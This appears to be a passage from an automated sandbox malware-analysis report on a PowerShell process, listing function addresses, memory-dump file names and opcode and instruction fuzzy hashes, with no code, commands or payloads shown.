                                      • Opcode Fuzzy Hash: 0c00133fa6a5efd90f3d666e24196ec7dde87d5e6bf1cf67cf5ad5e3789c9aa8
                                      • Instruction Fuzzy Hash: A99160B0A202069FEB14CB55C544BAAB7F3EF89314F148169E9056F392CB72DD51CFA1
                                      Function 080018E0 Relevance: .2, Instructions: 221COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7f5e9d348dee89ba5c9fc14ef5ec605fd641073a89cf6e382f0c4817119ceda8
                                      • Instruction ID: 2f96acf33bbe3b5535d3e07165f5648521aaf47417b66f63f2d6a120723b0407
                                      • Opcode Fuzzy Hash: 7f5e9d348dee89ba5c9fc14ef5ec605fd641073a89cf6e382f0c4817119ceda8
                                      • Instruction Fuzzy Hash: 9D81A034A05258DFCB15CBA9D4809EEFBF6EF89311F1480AAE454AB362D731AD45CF60
                                      Function 08005A40 Relevance: .2, Instructions: 221COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00717eb36748602c1b53189d421a2d35e96c9ab9650ed1198be645ee85c5fc5d
                                      • Instruction ID: 8a3b09c337293fe45780c5dc0c77266ee310e44cd8ed4e88cdff7ec01910e127
                                      • Opcode Fuzzy Hash: 00717eb36748602c1b53189d421a2d35e96c9ab9650ed1198be645ee85c5fc5d
                                      • Instruction Fuzzy Hash: 8F819034A042158FDB15DBA8D890AAEBBF3FF89301F148569D405AB395DB34DC46CFA1
                                      Function 07205DF4 Relevance: .2, Instructions: 216COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 81fe40c856f948f734cc4a267a6347ce2f7b4b90b3c1d083487c5c9ef341f11b
                                      • Instruction ID: f98d874414a21097275be6faf6d71360dc4fb7e1b4225a79fc2880cc36d284b0
                                      • Opcode Fuzzy Hash: 81fe40c856f948f734cc4a267a6347ce2f7b4b90b3c1d083487c5c9ef341f11b
                                      • Instruction Fuzzy Hash: E2916AB0A20206DFDB14CB55C144BAAB7B2AF89314F14809AE4056B392C772ED91CFA1
                                      Function 08006DA8 Relevance: .2, Instructions: 207COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 08e8076d896aa1766b3733e67e6816c36841f6fe2d1ef903cd1d7419ef1fe326
                                      • Instruction ID: dddc28a515ea21903d7705b1e35cd026c731110dc87156d49c2eece7f6f6c902
                                      • Opcode Fuzzy Hash: 08e8076d896aa1766b3733e67e6816c36841f6fe2d1ef903cd1d7419ef1fe326
                                      • Instruction Fuzzy Hash: 1E81B570A093858FDB06CF2CC8A45D9BBB2FF46320F1541DAD490DB2A2D7399C56CBA5
                                      Function 080010F0 Relevance: .2, Instructions: 204COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4b45b908bbd81f5656a0e56d89923959ece9c40689c6c61cf4009a2b7bceba7c
                                      • Instruction ID: 61cbd2bb3f31f9312d9de8b1f669c3dafa0e649304f6f31c30dabf5d33cc5a49
                                      • Opcode Fuzzy Hash: 4b45b908bbd81f5656a0e56d89923959ece9c40689c6c61cf4009a2b7bceba7c
                                      • Instruction Fuzzy Hash: C8719B30A002598FEB15DBA9D951AAEBBF2BF85301F104069E802AF395DB74ED49CF50
                                      Function 072056C0 Relevance: .2, Instructions: 192COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b452b009829711ba541620d3cabbaf1df227b682ca6a7241d1f1facde52ed8de
                                      • Instruction ID: ad8f610fecc467861e46490ccd1bad5f538b9bafde1b64f0c51fb298aaedae50
                                      • Opcode Fuzzy Hash: b452b009829711ba541620d3cabbaf1df227b682ca6a7241d1f1facde52ed8de
                                      • Instruction Fuzzy Hash: DD714BB4E20206DFEB14CB59C454E6EB7B2AF89314F14806AD8056F396CB32DD91CFA1
                                      Function 02C97A68 Relevance: .2, Instructions: 190COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3126b987f899efb74fe33de14771b2e03d8b6cbd3ff0df4060dfa8ff45181966
                                      • Instruction ID: 8671668d25902201a896b5e172436a38f83e0cc7daf08b0d802454e5a30a2f93
                                      • Opcode Fuzzy Hash: 3126b987f899efb74fe33de14771b2e03d8b6cbd3ff0df4060dfa8ff45181966
                                      • Instruction Fuzzy Hash: A871CD70A01208CFDB24DF68C884A9EFBB6FF85314F148969D415DB650EB34AC06CB80
                                      Function 02C97BD6 Relevance: .2, Instructions: 188COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 485013b2a57311889ad52cb2504167e147a457e2a8ee80adb1d64fd7089f54a9
                                      • Instruction ID: abdf6d4d670dd68e743a9f8284da444472e7ba13b9ad01b9c6cd757f03de7063
                                      • Opcode Fuzzy Hash: 485013b2a57311889ad52cb2504167e147a457e2a8ee80adb1d64fd7089f54a9
                                      • Instruction Fuzzy Hash: 7F715A70E012089FDF14DFA9D894BADFBB2BF88304F148469D412AB790DB35AD4ACB41
                                      Function 02C9F634 Relevance: .2, Instructions: 184COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a975fabcc846e83b32ebe917cd8f13d06404d7e365537bd9ac19cc5f83f4eadc
                                      • Instruction ID: ccfec4294839a0fc056016e23e4a3e7017ba8fc215a450c51f1706bca43891a7
                                      • Opcode Fuzzy Hash: a975fabcc846e83b32ebe917cd8f13d06404d7e365537bd9ac19cc5f83f4eadc
                                      • Instruction Fuzzy Hash: D67158B0E002089FDF14CFA9D88879EBBF1AF88314F24812DE414EB694DB759945CF95
                                      Function 02C9F640 Relevance: .2, Instructions: 180COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b64796b84cf2d6d9e9a8d0a9712c5ab1c52ce91265ce2b0cc9abc758667eb355
                                      • Instruction ID: 36d0317cd51ea46bea25cd636f8ed1d6271ea988b24517ca8bfd6125cdaaea0a
                                      • Opcode Fuzzy Hash: b64796b84cf2d6d9e9a8d0a9712c5ab1c52ce91265ce2b0cc9abc758667eb355
                                      • Instruction Fuzzy Hash: 30714970E002089FDF14CFA9C88879EBBF2AF88714F24812DE415EB654EB759941CF95
                                      Function 0720569E Relevance: .2, Instructions: 169COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3a36b463fc9786e16d108ddf4a735d94509030294ba91ba4683eed8858c06f59
                                      • Instruction ID: 06bf8c276fbff3fea7fdd457c4d19d3fae0fb841dfd86466d000ac896a426165
                                      • Opcode Fuzzy Hash: 3a36b463fc9786e16d108ddf4a735d94509030294ba91ba4683eed8858c06f59
                                      • Instruction Fuzzy Hash: C76183B4A24206DFDB14CF55C554EAEBBB2AF89314F18806AD8046F392C731E991CFA1
                                      Function 08006562 Relevance: .1, Instructions: 135COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f67f8f5a86b4869445db2a42a0f6e9ec4a3092cf0280ec34fb9a04b4cc216235
                                      • Instruction ID: 191af5b4925370cb2ee1b8b008ebc1d63c8b4a3d62c9dbfc6aee841aa2765a36
                                      • Opcode Fuzzy Hash: f67f8f5a86b4869445db2a42a0f6e9ec4a3092cf0280ec34fb9a04b4cc216235
                                      • Instruction Fuzzy Hash: 40516E30A053548FDB15CF6CC890AADBBB2FF5A314B25419AD4519B3A1D736DC52CF90
                                      Function 07209105 Relevance: .1, Instructions: 131COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 043a927fb69aaec76fa4e802dc780aaba020751054e055c199a83daa0f250b0d
                                      • Instruction ID: 05257f48b9bd7d2ab3861a10b05022ba12a939199c76edc272fc36e633bf97a6
                                      • Opcode Fuzzy Hash: 043a927fb69aaec76fa4e802dc780aaba020751054e055c199a83daa0f250b0d
                                      • Instruction Fuzzy Hash: F3419EF1B142029FDB2057B854147AEF7A29FD5214B14846BD582AF3D3DA72EC428BF2
                                      Function 02C977F9 Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8ded42ff7453cac089916fb296619fcbf35ba3c8ed01873d65631c3f2cca981d
                                      • Instruction ID: bb252af63f55b36e9bffceab426958650830fb406f8d132d7472fc4f0b52186a
                                      • Opcode Fuzzy Hash: 8ded42ff7453cac089916fb296619fcbf35ba3c8ed01873d65631c3f2cca981d
                                      • Instruction Fuzzy Hash: C2419F71B522048FDB15DB74C858AAEBBB2EF89354F044869E402EB7A0DF35AD45CB90
                                      Function 02C97A53 Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 198ae61f849dc6f8def54aad6d949e134a90a9c1de02c16c5ea64c2207d05469
                                      • Instruction ID: 772ec263c9647b6fc474a9875429f9f54decd67466f980ae7277b37d606e9c9f
                                      • Opcode Fuzzy Hash: 198ae61f849dc6f8def54aad6d949e134a90a9c1de02c16c5ea64c2207d05469
                                      • Instruction Fuzzy Hash: 24415D70E012088FDB14DFA9C8587EEFBB2BF89354F148969D005AB790DB74AD45CB91
                                      Function 08006D97 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: efbd08ba6e9e1aa6141ff40386ca2ff0d9271cbacc7361ded06fcfa3311b4a01
                                      • Instruction ID: 19345bce4d3676024d530e32051163eb2d8f206b033cc0c550b8930f0f889921
                                      • Opcode Fuzzy Hash: efbd08ba6e9e1aa6141ff40386ca2ff0d9271cbacc7361ded06fcfa3311b4a01
                                      • Instruction Fuzzy Hash: DF41F874A002558FDB15CF5CC884AAEB7F2FF49320B248658E915A73A4D736EC52CF90
                                      Function 02C9ACE7 Relevance: .1, Instructions: 117COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a737a6bba2fda4489edf5ae34cd7c220c8c5c1d51b70e71135de49d8292dc5c5
                                      • Instruction ID: e383b923baf6f1b4cb2af1dbfb549240e6b470f22c190e23e25b17223efe8677
                                      • Opcode Fuzzy Hash: a737a6bba2fda4489edf5ae34cd7c220c8c5c1d51b70e71135de49d8292dc5c5
                                      • Instruction Fuzzy Hash: 9D51DA34A00249AFDF15CFA8D584A9DFBB2FF88314F288159E405AB365C735AD82CF90
                                      Function 080067D1 Relevance: .1, Instructions: 114COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 615a83f4085942bf399ee1ee694de3e7a74867a22269519a160aeda995d731c4
                                      • Instruction ID: c7b6a28c828f669ce7fa1c5e1203fd7458a6df488b526b63b8b2c3486b58980f
                                      • Opcode Fuzzy Hash: 615a83f4085942bf399ee1ee694de3e7a74867a22269519a160aeda995d731c4
                                      • Instruction Fuzzy Hash: E7410874A002099FDB54CF9CC9949AEBBF2FF48321B248658E915A73A0D336EC51CF54
                                      Function 02C92BB0 Relevance: .1, Instructions: 111COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3bc7c884d61d909368bdf73ab4bf0b742441ff43a534b4e202dd1d7c819e8652
                                      • Instruction ID: 73867d9ce6de5a40ecb4df1e2b44f7d6ed11434ae98fb9f2e71ba7ed9f752a7d
                                      • Opcode Fuzzy Hash: 3bc7c884d61d909368bdf73ab4bf0b742441ff43a534b4e202dd1d7c819e8652
                                      • Instruction Fuzzy Hash: 57418970A00609DFDB15CF58C498AAAF7B1FF48314B218159D845AB760C736FC81CFA5
                                      Function 080010E1 Relevance: .1, Instructions: 110COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 021947877111f301512870eefc71376ca110213152a2e863a257279dd91d7ccb
                                      • Instruction ID: a291d6778aca64524b863af9cafd4e8d7a965cc8e2e5d791a4096f2084227a84
                                      • Opcode Fuzzy Hash: 021947877111f301512870eefc71376ca110213152a2e863a257279dd91d7ccb
                                      • Instruction Fuzzy Hash: 9E419E31E00219CBDB14DBE8C8506EEBBF2BF85341F104429E801AF394EB75A949CF50
                                      Function 07205A25 Relevance: .1, Instructions: 106COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0899cd6fff62cb8ce9187be157a4cc2547cbb2b7d45809cd5b0614673f818fed
                                      • Instruction ID: aabc9998fd72e9f3be569e1e74b79fc24e92d5b94ccda3e1899d707f38ab751f
                                      • Opcode Fuzzy Hash: 0899cd6fff62cb8ce9187be157a4cc2547cbb2b7d45809cd5b0614673f818fed
                                      • Instruction Fuzzy Hash: 1D317BB67242039BEB2406765850B7EF7928BC5210F14847BD502DB2D7EB72D9218FF2
                                      Function 07205508 Relevance: .1, Instructions: 102COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ff4ebba180bea4b2f8a9fee425fe4215b914bb5740c268c72cb654e7a3ab7a89
                                      • Instruction ID: b6b5057fbde4ccb29cfee0c08afe61041a9a5d11954062c201560176777b49c7
                                      • Opcode Fuzzy Hash: ff4ebba180bea4b2f8a9fee425fe4215b914bb5740c268c72cb654e7a3ab7a89
                                      • Instruction Fuzzy Hash: A431AEB5B50210ABE7149B64C854FAF76B3AFC5704F248025E9056F3E2CF72AD428F91
                                      Function 07200DE8 Relevance: .1, Instructions: 94COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5d76e5648adc5d1205abd2efcb03b544c0bd92bbc68be1af5e3768d5f7f3db5c
                                      • Instruction ID: f655333a5dc1dc4989af01cea248a5e379e89e9e935f6f589ccfec05d9e1a347
                                      • Opcode Fuzzy Hash: 5d76e5648adc5d1205abd2efcb03b544c0bd92bbc68be1af5e3768d5f7f3db5c
                                      • Instruction Fuzzy Hash: DF2161B232035BABF73459664900B3BB6D69BC9711F14843AE545EB3C3CE71D94083B1
                                      Function 02C9C1C0 Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc5165cbcb53c67216a62e1eac507bc86936cf467ff2802e887a8165bea52dd5
                                      • Instruction ID: 499a576fa652f060260f5954d3540a25b15303992f698d875667f0449ab9c729
                                      • Opcode Fuzzy Hash: bc5165cbcb53c67216a62e1eac507bc86936cf467ff2802e887a8165bea52dd5
                                      • Instruction Fuzzy Hash: 0A312C30A011188FDF25DB74C8556EEB7B2AF99348F1044EAD509AB351CB35DE85CF81
                                      Function 02C9A9D0 Relevance: .1, Instructions: 88COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6658b5209a5a8132bf1ea32e8a67b0e59e9de01a55d15254224fb725ef6ff8ba
                                      • Instruction ID: 64e3a7f199a4950d6d857fedb289d5a2e926676510444880d70d8e892a439771
                                      • Opcode Fuzzy Hash: 6658b5209a5a8132bf1ea32e8a67b0e59e9de01a55d15254224fb725ef6ff8ba
                                      • Instruction Fuzzy Hash: 5C313A75A002099FCB14CF99C584AAEF7B2FF48320B258299E419AB751C731ED81CFA0
                                      Function 080047D8 Relevance: .1, Instructions: 81COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 813defaf7282a70732a6c39e7c21d4f14055cd45ed1098803384fa3fdb45264d
                                      • Instruction ID: c791341ee86d0769c6a1927b0d3cb128443527b3a2aae5cde54236ee41a184cc
                                      • Opcode Fuzzy Hash: 813defaf7282a70732a6c39e7c21d4f14055cd45ed1098803384fa3fdb45264d
                                      • Instruction Fuzzy Hash: 1E312975A00605CFCB14CF48C4849AEFBB2FF88310B248699D519AB791C732EC91CF94
                                      Function 07200DCC Relevance: .1, Instructions: 78COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2cfe6f600c8cd2ed7888b14e81a69f328d7bb7284f54fdab87fd13dcdc26e680
                                      • Instruction ID: 774d9b60b27ece8451f69eac0be77d9ba6d9b27cca380a840903ad271c47ff3b
                                      • Opcode Fuzzy Hash: 2cfe6f600c8cd2ed7888b14e81a69f328d7bb7284f54fdab87fd13dcdc26e680
                                      • Instruction Fuzzy Hash: 01213EB23283DAABF7350A7649007367FD65F86710F18846AA548EF2D3C675D944C3B1
                                      Function 08000E00 Relevance: .1, Instructions: 78COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 979750c139c43f61ccf5cb879ba9e611e1023083bed5b65d59eecaf18ff2b032
                                      • Instruction ID: e0c480a48785cea011f2014db0ec73b871f01c49c46461742c6a018d1f9c481f
                                      • Opcode Fuzzy Hash: 979750c139c43f61ccf5cb879ba9e611e1023083bed5b65d59eecaf18ff2b032
                                      • Instruction Fuzzy Hash: 2E313A35E046498FDB10DFA8D588AEDFBF6BF48301F14806AD815A3381D730A881CFA0
                                      Function 072008F0 Relevance: .1, Instructions: 67COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 475979ba519d81bde5d5904fbd7bf2f1e6650f4d3999668eb5059cb44384b95d
                                      • Instruction ID: 78883275351fa26a98f90bcfc920bf58fabf07ce55a5c40af5398b9e780d1cce
                                      • Opcode Fuzzy Hash: 475979ba519d81bde5d5904fbd7bf2f1e6650f4d3999668eb5059cb44384b95d
                                      • Instruction Fuzzy Hash: 1A11D8B1A2021D9BEB249F6589417ADB7E6EF88610B148125DC19E7381D630DE41CBF4
                                      Function 080014B8 Relevance: .1, Instructions: 66COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: db51d71f0cc96717e81cad9ebb2a22378f93153b092d164364a33dc3ee4b9a45
                                      • Instruction ID: a19351b83956bce82a960a2316f867941f2d7c4a24a3fb632d9324c02abf0cd7
                                      • Opcode Fuzzy Hash: db51d71f0cc96717e81cad9ebb2a22378f93153b092d164364a33dc3ee4b9a45
                                      • Instruction Fuzzy Hash: E7112E352043448FD715D778E555AA9BFF5EF86310B0001BAE405CB3A2DB20DC0987F2
                                      Function 02C99597 Relevance: .1, Instructions: 65COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d0b724ace798fd3695236d04aff546c269ac92c54ad5114c5661cf6a574d5b7
                                      • Instruction ID: c0890901a07b722c87ec788faa00219c9a07bdcce08d2b9f50eb31a5ff92d62f
                                      • Opcode Fuzzy Hash: 3d0b724ace798fd3695236d04aff546c269ac92c54ad5114c5661cf6a574d5b7
                                      • Instruction Fuzzy Hash: B0212C74A002599FCB01DF58D980AAEFBB5FF49310B158199E809EB352C735ED42CBA1
                                      Function 08000FD0 Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf88a13d0a6e3147363754304464a33ed80af86a23fca40830769fcf54c5839f
                                      • Instruction ID: 5d8388b0562bbf94ffd8d0868e51fa747345b3d9a175e5135061fa51fa7ab1bf
                                      • Opcode Fuzzy Hash: bf88a13d0a6e3147363754304464a33ed80af86a23fca40830769fcf54c5839f
                                      • Instruction Fuzzy Hash: A40126313057505FC3059B38E844AA6BFA6BF8E21035000BAE549C73A2CA75ED06CB90
                                      Function 02C9F2E3 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 682ccced3d5a96e604ed35384b0ea5714553fec630e3f1f45e03dab966e257b0
                                      • Instruction ID: a0c71e6c26a9cf5bd4e304364662f545cfbff6411dd3b72143c714e0e1ea7288
                                      • Opcode Fuzzy Hash: 682ccced3d5a96e604ed35384b0ea5714553fec630e3f1f45e03dab966e257b0
                                      • Instruction Fuzzy Hash: A911D230D00288DBDF24DA98D98C7ECBBB2BF81319F24202DD005E6990DB7C9A89CF15
                                      Function 02C9ADF4 Relevance: .0, Instructions: 48COMMON
                                      Download Yara Rule
